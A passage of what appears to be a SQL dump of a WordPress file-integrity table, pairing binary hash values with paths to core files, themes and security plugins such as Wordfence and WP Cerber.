��+\\�','F}\Z\n��v�n�`��Z�!�T��W����s','',0,'?'),('��������3���k�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-dashboard-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���-����X>`b','�s��a�Ӌ�\0$T���bc8��dŅ���?>','',0,'?'),('��VϺz#���m)��','wp-content/themes/twentytwenty/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Χn��*�B\"�z���0B','��_\\�]-�V|���ʓO>;��O�$�Pw�2�','',0,'?'),('��.������I�\\�','wp-content/plugins/wp-cerber/assets/flags/jo.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z>\Z�➶6�A3+Lh�','��\'\"5��zF��aLK�3pr��*�=�.>aq\"','',0,'?'),('���\"ܒ����nzD','wp-includes/SimplePie/Caption.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܊��y�u�D\r£�','\'�W1Q�5[ۋ�)��\r�8۝5:��?*)K','',0,'?'),('���Wd�;C\r���O�','wp-content/plugins/akismet/views/notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�.-Ҿ�z�<��D��','�Qǣd3ME�D��v/�Z�_a�!�/.�A1���','',0,'?'),('��ˋ�_o!\'�u��r','wp-content/plugins/wordfence/views/common/page-tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)\Z���tU2Ec0\'�','�úM�..8��ѹ>Nw�j�Z����Wb��*B�','',0,'?'),('��Z\nu�oK� ��T;e','wp-admin/images/list.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��*�ӳ�S��','\\w��T[�=�b�aCk������;c���','',0,'?'),('��ll���x�L,7W�N�','wp-content/plugins/wordfence/views/common/modal-prompt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h���\r$��o��','l�?�9Rw\"H�^�\r�s�������\ZD:�F�a','',0,'?'),('���Uy/�*%��;','wp-admin/includes/update-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y��4�-��͕*s','��qO��j�[��=�\\����rc�8�s�H�','',0,'?'),('�\rE��U���̈́��','wp-includes/images/wpspin-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mS������y\"C���','��66S�X������6O}�4>�p�\"���\'1','',0,'?'),('�W���P旃^q�y�','wp-content/plugins/wordfence/lib/menu_firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5X��P���K���','�S���P���A�_�l�W��2��?#_\rQ�x�','',0,'?'),('�I=bh�ʔGIkoba','wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N_=r��V�oAՌB�','�u��$�\n\r�K���S��-�w/?_��#K','',0,'?'),('�1�1]PC��g4�FU=','wp-content/plugins/wordfence/js/jquery.colorbox.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(O�0%6�9�e�3�j','{�L�#�\r��]�\ngL8P,���@��Ir,{ �','',0,'?'),('�h/͔��j�C�\0�n','wp-admin/includes/class-plugin-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�pT�0$�����.�','?�t�D~#͘��/X�#G/���Nf\\��͜gN','',0,'?'),('�x�W���2e�uv�L','wp-includes/customize/class-wp-customize-background-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{f�&��E\\$�sX�','R�v3����~������|.O�L�t�N`Ѯ��','',0,'?'),('�6���?�^o�#�','wp-includes/sodium_compat/namespaced/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r-�e��r^�!�~','��`��R�lԥLz�?i�āACH�󞮣Py�n','',0,'?'),('���R	�(�,	!)�Z','wp-content/plugins/wordfence/waf/pomo/mo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��6��~.���S�[','��\\\'�_F�u�C)CR\"(C�O�YW�!��)','',0,'?'),('��K}{X��UG9<p�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�>�ᠼU��/G�@','��oyJ(B��f2H\'�h�!�\'* ɹ*��','',0,'?'),('�������݈3�+P\r','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����,0��Z%���','�g^�M���9=&*�M{��Xb�0*�u���','',0,'?'),('���vi��z\0�','wp-content/themes/magazine-hoot/hybrid/inc/functions-attr.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӛ��ù���D�Z\0\r�','ˉ~I��˜G%_Z��\Zr��v\\������','',0,'?'),('�����&@p����ɗ','wp-includes/js/dist/wordcount.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ǣ�6Ӯ����H�pL','��A+l:#I�-A��5�J�iQ��ڙRW�w\0r�','',0,'?'),('���ΦHc�^����)','wp-content/plugins/wordfence/views/scanner/issue-control-edit-user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������\'�{=ͺ','���R������_f�W{*3����ݔ	�\"�/�','',0,'?'),('�ǀ����\\�,6;�','wp-content/themes/magazine-hoot/include/enqueue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I���V��Y��{','�`�V��(��\rf}LJ�m��sEf�U���u��V','',0,'?'),('������sp���e�','wp-admin/includes/class-wp-ms-sites-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[II�[�I#i��','<�C~��-.�\0��9q�\\��}�)���~�[$','',0,'?'),('��	�ӭgȱ!n�P�','wp-includes/IXR/class-IXR-client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a���J�}��!�W��','Yw��1��v.�G3e�d��Ä��y`LR	]','',0,'?'),('�(������]dJ\rl','wp-content/plugins/wp-cerber/cerber-addons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǜ�9Twu*�Ҳ�i','��v� %Kj��׹�\\J��/��௜՝mRb��X','',0,'?'),('�-1�8�;�T�/X�]','wp-admin/ms-sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f3����&S��7F76�','���,�$�y�n)R��Hg���h{�$��U��','',0,'?'),('�K���4�7\'�Rh?�','wp-content/themes/twentytwenty/readme.txt',0,'��Baĸ�Y��~ϟ��','��Baĸ�Y��~ϟ��','\\װ��c_AX�C�^���`\\{\Z,�t','',0,'?'),('�j�<M�Dd����4m�','wp-admin/includes/ms-admin-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;�Ƽz�g�L���','��t�Mp���Q�8=��~bw����/���','',0,'?'),('�Ρ~�ߓ�:����eo','wp-content/plugins/wordfence/images/icons/tick128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ğ��c�h4\"���','����V��}X e~G[C�峆��5������','',0,'?'),('�����(觨:pR�/','wp-includes/class-walker-nav-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S��|8���~Rx�4','�P�6��^��9�hQ=�Ʉ�����A��X��','',0,'?'),('��J�$R��_���o�','wp-content/plugins/wp-cerber/assets/flags/lk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m ���t�����','vl�a��tb�N���u�G�:���<?�7�=','',0,'?'),('��(5�aH�yo,X�','wp-includes/js/jquery/ui/tabs.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a`|��^(=`��hv','L�.X_	�DJ��tk��H��!|��ݔJ��x','',0,'?'),('�/7�ñ�cx��p��g','wp-content/plugins/wordfence/views/onboarding/fresh-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�c��D���o�	','|�!��^(��^�~���c��m\Z/^fŠ�[','',0,'?'),('���ڥ�^i�$��&','wp-content/plugins/wordfence/lib/wfCredentialsController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��\0����իw6�','7�6��ay��5�?}%.]����؞u���S�','',0,'?'),('�$�͓�bHn��,\0-','wp-includes/images/smilies/icon_confused.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/#	�Ӣww$x꾓Y','U0�\\L�X��fXƦ�G\0�T���$a�5U�B�','',0,'?'),('�-��췓��9�ExZ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xw���Tg���A}�\n','�k�cQx�e�˳`=n6�X5y��dz5u]WB\'','',0,'?'),('�N��ZND��N�>Y	','wp-includes/js/dist/components.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)��[Ŕ��^�2��','��v�,�$.����b��߲���^�#n1�c�,','',0,'?'),('�{4�.������#�#','wp-content/plugins/wordfence/modules/login-security/classes/controller/support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��ʆ�wq��F��','R�	j[�8ح͸�W����E�H��̅�a��I','',0,'?'),('��뻛Ib�,6�Y+�8:','wp-content/themes/twentynineteen/sass/typography/_copy.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n�L�ر^��#*��s','+�\\��`F���~���)?���9G�}B1��','',0,'?'),('��v\'j@�-��*','wp-includes/widgets/class-wp-widget-media-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7_^\\fS�ɉ�]6n#\Z','>�@ΡD���&���{�(���Dγ����i�O#','',0,'?'),('�\n]Eg���7Oq�b��','wp-includes/sitemaps/class-wp-sitemaps-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����G���o�\n�>','>��\0�B��[��Z��>�p�ޏ�a0~5k�[�G�','',0,'?'),('����n��j�P�+��','wp-admin/includes/class-custom-image-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ո�8��>�R�n�e',']1�9{k��P�f�6з�ɏj�WI�	\n','',0,'?'),('�\Z�������Bi/6�','wp-includes/js/jquery/ui/effect-clip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']02[W�0V1�Q','�|�JR?�]ϭ̺\\T�v���� ��5t����$','',0,'?'),('�L���yE�{��f�','wp-includes/css/dashicons.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֍k����U�о�3�','|�38�9&ΚG�\"#��\0̠��;���e�R�','',0,'?'),('�g�bf�\r\Z��ъ�','wp-includes/blocks/rss/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_Fɠm(��nJ��ZEG','�S�5��X��9������mOX�>s��l��','',0,'?'),('�k�UL��ǡ�$���','wp-admin/ms-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','³u~]�*C�u�\0�','e�s}k�_��q}���~G���[�5�Q�u�!�','',0,'?'),('�o/N���t$�$���|','wp-content/themes/twentytwentyone/assets/sass/05-blocks/code/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	��RXjJw�E��','��O�V�P�K��Lѐ��(Е�#uu.�','',0,'?'),('��=��-Xԍn{]�pf','wp-includes/js/wp-embed-template.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lq3UN�:�9�:^E��','3R�X�o��}Q��P��b�������J��','',0,'?'),('��we�i!<��s�y\n','wp-content/plugins/wordfence/views/scanner/issue-optionBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t��\"N��+�՛L�','�67�E0�܃�ՐC�{\\a�dPb�2�+�pW;P�','',0,'?'),('�����۝w6Uu%��','wp-includes/js/dist/vendor/wp-polyfill-element-closest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<j��� �<Yt�#�&','yNOBӻ�]&6�M�-��J��.�����:.�{','',0,'?'),('����S�D��~��p�v','wp-content/plugins/wp-cerber/assets/bn3ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�\n`ehG�����}�','Ul,��/��g����Qg�\'���	�I�&','',0,'?'),('���fSu�B�ͥ?^yO','wp-admin/css/themes.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d��y\Z�pK�3����`,','\\\r�$��D�Tl�b��ANĄH�\"ݷ����8','',0,'?'),('����{^��W����C�','wp-admin/css/colors/ocean/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�Ss�li4��l1�','O[�~_uO�\r�i�e�s�^��ޘ���!��\nyK=','',0,'?'),('����	��*Q��^','wp-content/themes/twentytwentyone/assets/sass/05-blocks/html/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c\'[�g`.Ƿ{k','�{K��.(��\Z�\0����<��!rv�+=8���','',0,'?'),('��3T,�M��	nÀ�4�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/video/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���@ۓb�����hX�','�ڊ�j�9�y���v\n�oC/�`��ny','',0,'?'),('��b��֏�� �$;�h','wp-content/themes/twentytwentyone/assets/sass/05-blocks/heading/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���D�Vr�|HH�','���Ҵ?5��n���P6ֆ�>�{\0-x��e','',0,'?'),('��$[��tCŤIw','wp-includes/sodium_compat/src/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�	��,��~�r�','L>���e������h�\rF$�C�V������7�','',0,'?'),('�m5��u����1}�','wp-includes/css/dist/block-library/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q��/���c�','�8�OG�I%��(�n6�)�lhf6f��','',0,'?'),('��&B�5V�AUU,��','wp-includes/class-wp-http-cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`=Y=��3���p*���','�n�<o��%�/�U\"y�\"���)�����B�','',0,'?'),('�1A��bȱ��8��EN','wp-includes/blocks/group/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6qigV�+�\'�^�N�','�����Bi�B�\rv�\rM5���\n9\'�d��р9�','',0,'?'),('�_f��;w�a��ځ�','wp-includes/js/tinymce/skins/wordpress/images/gallery.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_���Pw��PU�4','<W~���ض��+�hN��9��1�_�3�w�s','',0,'?'),('�g�ӨH7\ng��3L','wp-content/themes/twentytwenty/assets/js/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ln��>�+�M��,','!�7U�`���^��:��8��o�_: � ','',0,'?'),('�u��<e�x��@ֈˆ>','wp-includes/js/underscore.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' >��>��S����b�%',' ʍ��LM>	�ύ��5́kv��k�PHɇ0','',0,'?'),('�zub�d��3��_T�?','wp-content/plugins/wp-cerber/cerber-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A2?�f\\�~��1�D�','�+ ���+�6U��TRO�m�E�?<|�K�\nL','',0,'?'),('���])T�����N25F�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidRequestException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GR˗c��?qt�','֝Rz5B�,��nɲ�����\nHoڨ��|','',0,'?'),('��q?%�rp��0�7�q','wp-admin/css/colors/coffee/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!n�ΟӾ�)�X�','��aA=�M��X�绚����4#��A�iΡ\r���c','',0,'?'),('�����,/r�]��1S','wp-content/plugins/all-in-one-wp-security-and-firewall/logs/wp-security-log-cron-job.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��-[����S�_عQ�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/IpAddressNotFoundException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1:��!�G~�q�ic','^�DCguPT!>����W��\Z���k�~_5\n8','',0,'?'),('��;��K�P[�լ���','wp-content/themes/twentytwenty/assets/images/2020-three-quarters-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u$���N����\r6','��Y0�‚�hb_�%��/��_1�$Z�~xψ','',0,'?'),('��zvo:���B%���','wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�h���%u-C�\0�','\"Y¤&6HU�^��\'�$���=_;>����','',0,'?'),('����x�Й�)DC��<','wp-includes/js/customize-models.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'�~G~�Ԟ�','�h�3XVx�p��T��OS‘Sfb��\r�E捵�','',0,'?'),('�~����U�\"�&��','wp-includes/images/wpicons-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n�V�o�$��Of~7','�]کA=�ђ�%�q�%aM�����B�U�p','',0,'?'),('�_��S�ަ�:{j�}','wp-content/plugins/wp-cerber/assets/flags/do.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n���*{\0�4��sV','\n�/�H��Ҿ/���\\����-ܧ��Rx�','',0,'?'),('��W2��D��G�7�V','wp-admin/css/common-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����m����{d�X��',')\\k���:Es�%vn�6Z�R\ng�N*1D��)&�','',0,'?'),('��M��~\n�T|�','wp-includes/js/mediaelement/wp-mediaelement.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ꕂv��EK�‡?\r�~_','!?�[��_���r��=&�\n�-%!y��\r�','',0,'?'),('�.\Zg�IA�D1��kl�','wp-content/themes/magazine-hoot/hybrid/extend/customize/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>��$*N�hF#�=�','n?�6sF><�f�\'�)���7]b`�l�%Ca�','',0,'?'),('�Vb(kt�W\"�6(;ƴ�','wp-admin/includes/class-wp-media-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ͳ���k�o�T��A=','�ӵ�f�K��N�_β�s:�v%�Y=����','',0,'?'),('�_�����PM�gy/','wp-content/themes/magazine-hoot/hybrid/css/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���6 ��u�9N','k��L�o���=�،;ý����Lۗ��wn�\r�','',0,'?'),('�iȜ�1��\0���8','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-php7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S;h8�^��g�R','��m�fʬ�����S�XT����8��A�-�g�','',0,'?'),('�tfF	�r{�܇�_I�x','wp-includes/SimplePie/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+��dGzC\0��u\r��','a���,�\"���Ɣ_*{�Z��m���ɛ���','',0,'?'),('�|]�D��\Z.�E','wp-content/plugins/wordfence/views/scanner/scan-progress-element.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���o�H?6\Z���x','(����%�����C��㏞�d�\"��A��','',0,'?'),('�Ŏ��O�NJ�`','wp-content/plugins/all-in-one-wp-security-and-firewall/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�\n�ot}l�!E�`I','wp-content/themes/twentytwentyone/assets/sass/04-elements/misc.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m\0�\\��n�+��Ö','ƌ�%{�cUkw��\r��^p%���$L�`��','',0,'?'),('��߲;��0����','wp-includes/feed-rss2-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��6<�v�z�L','�3۸�kH��?�1B�g#~<X��gbe�','',0,'?'),('������/�n����','wp-content/plugins/all-in-one-wp-security-and-firewall/images/plugin-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r]��^g��\Z�/]T��','�y�涩�x���Ƞa}���s矛���+�br)','',0,'?'),('�!�-LHv�)��n��#','wp-includes/https-detection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�5\\�r���(�W','W�|�_`|\\��y{4�N���Vp����j[','',0,'?'),('�<��g�=�C�״qD','wp-includes/customize/class-wp-customize-themes-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uZ���7ѳ����U','aMk��M.�ݚ�fJ>����{�V���>v2U','',0,'?'),('�PC<��	���vn�R8','wp-content/plugins/wordfence/images/tools.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@cI�����','��Y��=������RB�)	~����ܖݟr','',0,'?'),('�m�CB.ե�>F_�#','wp-content/themes/twentynineteen/sass/media/_galleries.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�md��~����','�6�!1oAu�Eo���Fw�9\n4\0�\\%wM�\r�g','',0,'?'),('�v>�8��\'��T6���X','wp-includes/js/jquery/ui/progressbar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��=i�D��_zy�\r3','��_n�����)S����6�3+n�3���','',0,'?'),('��,��M��;v��','wp-content/plugins/wordfence/views/dashboard/options-group-import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3�%?b�����~\0','o~!��A3V�x|�t�;�\'�3�-�I�\n�','',0,'?'),('��3�T.^�ƙ<���','wp-mail.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^��p��C�!�Ԑ,','�����\0�\nIP�t}3RΘ/#����A�','',0,'?'),('���:T�L�5�EF�Vc','wp-content/themes/twentytwentyone/assets/sass/04-elements/links.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�v_�`���n�/T','�P��s\'\n�B��KM$꼓rfy6yݵ[���e','',0,'?'),('��\'��@S �D���','wp-content/plugins/wordfence/views/scanner/issue-control-ignore.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\na�g/�H��2*�e','n�R��Z�,�7G\'���fͺi߶�	�+!c��','',0,'?'),('��K���OȖ9�3|<�','wp-admin/maint/repair.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ޙ���~��M♸�','IoT�]��j�J��~�ď�7bn!M|��!F��','',0,'?'),('��I���.$U0]\'�S_','wp-admin/includes/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZS-�.��G|J\"5','�Q�A.V�i��#\r�RJ���i.7�@B��d�','',0,'?'),('��+D�FܿTZ[H7','wp-admin/images/post-formats-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S�l��H\\�������','e�t���w|W�{x�y%K:��QE7������','',0,'?'),('�Y��ɗߤ�ҽi��','wp-content/themes/magazine-hoot/include/sidebars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�XfY�N�b�߬Z��','�R���N�bPA����3�%s\'��Mb�','',0,'?'),('�)Sl�W)�l�h�J\'.','wp-content/plugins/wp-cerber/assets/flags/me.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{H`C��~���^8�X','��&�P�-urk�P�����\"~aZ��ޢ�','',0,'?'),('�2�>�[{�Lj�0�s�','wp-content/plugins/wp-cerber/assets/flags/ai.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�]��à�a�{��','*[3#�h���\"M�@]l�Ή05>И��ۖf','',0,'?'),('�<�3�v��&F','wp-content/plugins/wordfence/views/scanner/scan-failed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"x�;���h�O���','��I}l�|U�j�Pr���7��ڲkV���`��','',0,'?'),('�A?�]\\8�PMT�l','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C�B�)c��ae���','�[}���D���\0OV�:~-�\"~mBh\"<�pW�','',0,'?'),('�GV\\z��#���!;��','wp-includes/js/media-audiovideo.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f��}�юFǑ+���','���U��#�QC�F����F:,�}��u���KP','',0,'?'),('�M��s�;\',���-E','wp-admin/css/dashboard-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Yk|��v���','*�x)��68NHɎ3 �AhC�	\'q~a� I<�','',0,'?'),('�O�r#��T�G��!','wp-includes/js/swfobject.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���,�I}p�e~2�q�','?��Lw���.�4M��ՒF�J�>fI�鴆�','',0,'?'),('�l&�*������&','wp-includes/SimplePie/Content/Type/Sniffer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JVP�t>%N����\0','\n��S/��̼#@��%���,�ul��$t���T��','',0,'?'),('�w�\Z��plUz�Q�','wp-content/plugins/wp-cerber/assets/flags/ly.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�,ʁ���]��r�V','t��\n�jM��l��0�^��f&���`ʃ','',0,'?'),('���$(�g�(���P��/','wp-admin/css/wp-admin-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�Q5\'EY�o�0�}�_�','0�|TF����O 	�.�����.��>��CEj��','',0,'?'),('��{T�l���5&�x�','wp-content/themes/magazine-hoot/include/fonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�,�v��ȹR�Rά�','$��\n��Z���s!�.,��#R�Ef8\0=��V','',0,'?'),('��5��At߂�m0i�z�','wp-admin/css/themes-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d��FK�0��\0]0','?����l�̚U�^���t1\0#U|Yh�|�\"\Z','',0,'?'),('����92R]�X~�i�','wp-content/plugins/wp-cerber/assets/flags/bg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��g��:�؀uO�c','�{h�s`�W�\\�v���n�OF�\Z�r���J�s','',0,'?'),('���q�K�U�j�','wp-includes/SimplePie/Category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{���[�� �ZVG�4&','�<��J�H�v�i�	b�4l~�e�F��mj�','',0,'?'),('��O­\n	�U��Rb','wp-includes/Requests/Exception/HTTP/304.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;F4�A�I���T�','v��C���	a�\'F�;���z���(eJ��L','',0,'?'),('��-Z���:E�:','wp-admin/js/image-edit.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�M��l~%������','\\�%k�����;�,׾����ay\\�s�A\'','',0,'?'),('���|�jX����|�fb','wp-admin/css/login.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qT������b�W�[}','�P\'���)�Y&T��j���A�- \"��2~','',0,'?'),('�*i�8��]�\n4����','wp-content/themes/twentynineteen/print.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0)ݴ�`I4�P?Y$2|\n','��$�eI�8a��*�����\0��D��B�0','',0,'?'),('�<t@�zfj����r�h','wp-content/plugins/wp-cerber/assets/flags/ht.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Wѭ�b;��t�','#{�՞p�.3��T���[�Kj�P�x�=','',0,'?'),('�MR��l�B�F�u','wp-includes/option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�2�ZB0����','����+�9*$��<��*G�T���:*N�j���','',0,'?'),('�r�\\�j�����A$�','wp-includes/js/customize-base.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Gx�Fy1w��׻','�s7�-<%���WȒߚC�.��.	��zW','',0,'?'),('�����\"Sέ`t@','wp-admin/network/plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R\n��.o���Ʊ2bw','�A�gp����/�m��,&Rq�f9ey��$=�','',0,'?'),('��K?�r��a#Qh','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/InvalidRequestException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ia����Rɞ%x��','���M�� 